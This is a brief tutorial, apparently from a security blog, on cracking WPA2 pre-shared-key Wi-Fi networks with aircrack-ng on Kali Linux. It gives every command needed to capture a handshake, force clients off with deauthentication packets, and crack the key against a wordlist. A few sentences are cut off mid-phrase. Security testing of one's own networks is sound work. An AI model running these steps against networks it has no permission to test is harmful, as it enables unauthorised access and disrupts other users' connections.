This short tutorial walks you through cracking WPA2 networks which use
pre-shared keys using the aircrack-ng suite of tools to assess WI-FI
network security. All of the necessary tools come preinstalled with the Kali
Linux distribution. The
# in front of commands means, that they have to
be executed as the
root user, e.g. using
Wireless card into monitor mode
List all possible programs that could interfere with the wireless card. If
kill is specified, it will try to kill all of them.
# airmon-ng check kill
Enable monitor mode on an interface (here it’s
wlan0) and check if it worked.
# airmon-ng start wlan0
List Wi-Fi networks and their BSSIDs, Channels, etc.
# airodump-ng wlan0mon
Narrow search down to specific BSSID (MAC address).
# airodump-ng wlan0mon -d <BSSID>
Capture WPA2 handshake and write it to file (e.g.
to change interface name, if needed.
# airodump-ng -w handshake -c <channel> --bssid <BSSID> wlan0mon
Optional in other terminal: Simultaniously send deauthentication packets to clients on the network to capture WPA2 handshake by forcing clients to reauthenticate. Without this step, it might take some time to capture the handshake.
# aireplay-ng --deauth 0 -a <BSSID> wlan0mon
After storing the handshake in e.g.
handshake-01.cap, we can finally crack the
# aircrack-ng handshake-01.cap -w dictionary.txt